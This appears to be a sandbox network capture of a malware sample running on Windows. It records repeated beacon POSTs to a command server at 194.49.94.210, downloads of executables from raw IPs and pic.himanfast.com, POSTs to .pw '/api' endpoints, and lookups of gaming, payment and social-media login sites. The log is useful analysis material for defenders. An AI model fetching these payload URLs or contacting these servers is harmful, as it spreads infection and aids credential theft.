set-cookie: MUID=2F3E213EF3F86BD22A7C32E6F2B06AA2; domain=.bing.com; expires=Mon, 23-Dec-2024 13:59:23 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 58E9E6A46EAE416E8F15CC0782E4D875 Ref B: BRU30EDGE0921 Ref C: 2023-11-29T13:59:23Z
date: Wed, 29 Nov 2023 13:59:23 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2F3E213EF3F86BD22A7C32E6F2B06AA2

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AB30D7FA9F7140A7A5863DE57AF8DDC9 Ref B: BRU30EDGE0921 Ref C: 2023-11-29T13:59:23Z
date: Wed, 29 Nov 2023 13:59:23 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2F3E213EF3F86BD22A7C32E6F2B06AA2

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D97C6C9024B3458AB58A7A69A845C826 Ref B: BRU30EDGE0921 Ref C: 2023-11-29T13:59:23Z
date: Wed, 29 Nov 2023 13:59:23 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

198.1.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.1.85.104.in-addr.arpa

IN PTR

Response

198.1.85.104.in-addr.arpa

IN PTR

a104-85-1-198deploystaticakamaitechnologiescom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR
DNS

25.14.97.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.14.97.104.in-addr.arpa

IN PTR

Response

25.14.97.104.in-addr.arpa

IN PTR

a104-97-14-25deploystaticakamaitechnologiescom
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xuskwwuepoug.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 277
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cylnywvcbuhd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 365
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gbkbqoybakk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 191
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cmclhggggvd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qcrjmnhaslsyeeos.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lxcjxwjhmqxyfwa.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 312
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://185.196.8.238/supstrim.exe

Remote address:

185.196.8.238:80

Request

GET /supstrim.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.196.8.238

Response

HTTP/1.1 200 OK

Date: Wed, 29 Nov 2023 14:00:16 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
Last-Modified: Tue, 28 Nov 2023 04:20:23 GMT
ETag: "e3200-60b2ebcc23b2e"
Accept-Ranges: bytes
Content-Length: 930304
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://5.42.65.80/brandrock.exe

Remote address:

5.42.65.80:80

Request

GET /brandrock.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 29 Nov 2023 14:00:17 GMT
Content-Type: application/octet-stream
Content-Length: 16478720
Last-Modified: Tue, 28 Nov 2023 17:17:33 GMT
Connection: keep-alive
ETag: "656620ad-fb7200"
Accept-Ranges: bytes
DNS

210.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.94.49.194.in-addr.arpa

IN PTR

Response
DNS

238.8.196.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.8.196.185.in-addr.arpa

IN PTR

Response
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

126.20.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.20.238.8.in-addr.arpa

IN PTR

Response
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ytotgynvbyv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 215
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xqrjyiuwlkgw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 348
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 51
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gsdukiabtet.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 170
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ibpdvgkbrbmiey.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 199
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tvewaxacioojno.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 189
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ifxelylyqqsbfw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 217
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gwaqdqeakkoielkd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 367
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://aqapydwjgmu.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tppaedawovubw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 140
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bmpwoojgnok.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 265
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sdaglqtywcpwot.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 113
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nuhexmaldcm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 228
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dbdwieqvyktrvuxm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://txslawurffhfe.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 162
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://194.49.94.210/fks/index.php

Remote address:

194.49.94.210:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lafmfgxeiyn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 210
Host: 194.49.94.210

Response

HTTP/1.1 404 Not Found

Date: Wed, 29 Nov 2023 14:00:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 414
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

pic.himanfast.com

Remote address:

8.8.8.8:53

Request

pic.himanfast.com

IN A

Response

pic.himanfast.com

IN A

188.114.97.0

pic.himanfast.com

IN A

188.114.96.0
GET

http://pic.himanfast.com/order/tuc6.exe

Remote address:

188.114.97.0:80

Request

GET /order/tuc6.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: pic.himanfast.com

Response

HTTP/1.1 200 OK

Date: Wed, 29 Nov 2023 14:00:33 GMT
Content-Type: application/octet-stream
Content-Length: 3558077
Connection: keep-alive
Content-Description: File Transfer
Content-Disposition: attachment; filename=tuc6.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I1fzAENymVQarwP645Sg1yjuwpKP83u1Yu6Hc43abORTbPlx%2Fdu4%2FDsLvv2mxgH7IkOZhdonYnvgXNr2g56P8C%2Ff6uUKjhRsq640hr%2BYqMrYAfwM1l0dojfXYW%2FrDS3yPov3Qw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82db60a72d3ab8d0-AMS
alt-svc: h3=":443"; ma=86400
DNS

0.97.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.97.114.188.in-addr.arpa

IN PTR

Response
DNS

16.205.10.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.205.10.195.in-addr.arpa

IN PTR

Response
DNS

medicinebuckerrysa.pw

Remote address:

8.8.8.8:53

Request

medicinebuckerrysa.pw

IN A

Response

medicinebuckerrysa.pw

IN A

188.114.96.0

medicinebuckerrysa.pw

IN A

188.114.97.0
POST

http://medicinebuckerrysa.pw/api

Remote address:

188.114.96.0:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: medicinebuckerrysa.pw
DNS

0.96.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.96.114.188.in-addr.arpa

IN PTR

Response
DNS

steamcommunity.com

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.222.49.98
DNS

www.epicgames.com

Remote address:

8.8.8.8:53

Request

www.epicgames.com

IN A

Response

www.epicgames.com

IN CNAME

epicgames.com

epicgames.com

IN A

54.146.109.75

epicgames.com

IN A

34.203.82.216

epicgames.com

IN A

34.203.147.161

epicgames.com

IN A

3.232.234.121

epicgames.com

IN A

34.230.172.193

epicgames.com

IN A

52.44.54.200

epicgames.com

IN A

23.20.77.70

epicgames.com

IN A

52.22.225.93
DNS

80.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.94.49.194.in-addr.arpa

IN PTR

Response
DNS

235.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.175.169.194.in-addr.arpa

IN PTR

Response
DNS

store.steampowered.com

Remote address:

8.8.8.8:53

Request

store.steampowered.com

IN A

Response

store.steampowered.com

IN A

104.85.0.101
DNS

75.109.146.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.109.146.54.in-addr.arpa

IN PTR

Response

75.109.146.54.in-addr.arpa

IN PTR

ec2-54-146-109-75 compute-1 amazonawscom
DNS

98.49.222.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.49.222.23.in-addr.arpa

IN PTR

Response

98.49.222.23.in-addr.arpa

IN PTR

a23-222-49-98deploystaticakamaitechnologiescom
DNS

www.paypal.com

Remote address:

8.8.8.8:53

Request

www.paypal.com

IN A

Response

www.paypal.com

IN CNAME

www.glb.paypal.com

www.glb.paypal.com

IN CNAME

paypal-dynamic.map.fastly.net

paypal-dynamic.map.fastly.net

IN A

151.101.1.21

paypal-dynamic.map.fastly.net

IN A

151.101.65.21

paypal-dynamic.map.fastly.net

IN A

151.101.129.21

paypal-dynamic.map.fastly.net

IN A

151.101.193.21
DNS

101.0.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

101.0.85.104.in-addr.arpa

IN PTR

Response

101.0.85.104.in-addr.arpa

IN PTR

a104-85-0-101deploystaticakamaitechnologiescom
DNS

accounts.google.com

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.27.84
DNS

twitter.com

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.65
DNS

21.1.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.1.101.151.in-addr.arpa

IN PTR

Response
DNS

85.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.65.42.20.in-addr.arpa

IN PTR

Response
DNS

84.27.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.27.250.142.in-addr.arpa

IN PTR

Response

84.27.250.142.in-addr.arpa

IN PTR

ra-in-f841e100net
DNS

65.42.244.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.42.244.104.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

110.208.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

110.208.58.216.in-addr.arpa

IN PTR

Response

110.208.58.216.in-addr.arpa

IN PTR

sof01s11-in-f1101e100net

110.208.58.216.in-addr.arpa

IN PTR

ams17s08-in-f14�J
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
DNS

83.39.65.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.39.65.18.in-addr.arpa

IN PTR

Response

83.39.65.18.in-addr.arpa

IN PTR

server-18-65-39-83ams1r cloudfrontnet
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

i.ytimg.com

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.251.36.22

i.ytimg.com

IN A

142.251.39.118

i.ytimg.com

IN A

172.217.23.214

i.ytimg.com

IN A

216.58.208.118

i.ytimg.com

IN A

216.58.214.22

i.ytimg.com

IN A

142.250.179.150

i.ytimg.com

IN A

142.251.36.54

i.ytimg.com

IN A

172.217.168.246

i.ytimg.com

IN A

142.250.179.182

i.ytimg.com

IN A

142.250.179.214
DNS

22.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.36.251.142.in-addr.arpa

IN PTR

Response

22.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f221e100net
DNS

106.208.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.208.58.216.in-addr.arpa

IN PTR

Response

106.208.58.216.in-addr.arpa

IN PTR

ams17s08-in-f101e100net

106.208.58.216.in-addr.arpa

IN PTR

sof01s11-in-f106�I
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

tirechinecarpett.pw

Remote address:

8.8.8.8:53

Request

tirechinecarpett.pw

IN A

Response

tirechinecarpett.pw

IN A

172.67.154.200

tirechinecarpett.pw

IN A

104.21.13.53
POST

http://tirechinecarpett.pw/api

Remote address:

172.67.154.200:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: tirechinecarpett.pw
DNS

200.154.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.154.67.172.in-addr.arpa

IN PTR

Response
DNS

abs.twimg.com

Remote address:

8.8.8.8:53

Request

abs.twimg.com

IN A

Response

abs.twimg.com

IN CNAME

cs510.wpc.edgecastcdn.net

cs510.wpc.edgecastcdn.net

IN A

152.199.21.141
DNS

api.twitter.com

Remote address:

8.8.8.8:53

Request

api.twitter.com

IN A

Response

api.twitter.com

IN CNAME

tpop-api.twitter.com

tpop-api.twitter.com

IN A

104.244.42.2

tpop-api.twitter.com

IN A

104.244.42.130

tpop-api.twitter.com

IN A

104.244.42.194

tpop-api.twitter.com

IN A

104.244.42.66
DNS

pbs.twimg.com

Remote address:

8.8.8.8:53

Request

pbs.twimg.com

IN A

Response

pbs.twimg.com

IN CNAME

cs196.wac.edgecastcdn.net

cs196.wac.edgecastcdn.net

IN CNAME

cs2-wac.apr-8315.edgecastdns.net

cs2-wac.apr-8315.edgecastdns.net

IN CNAME

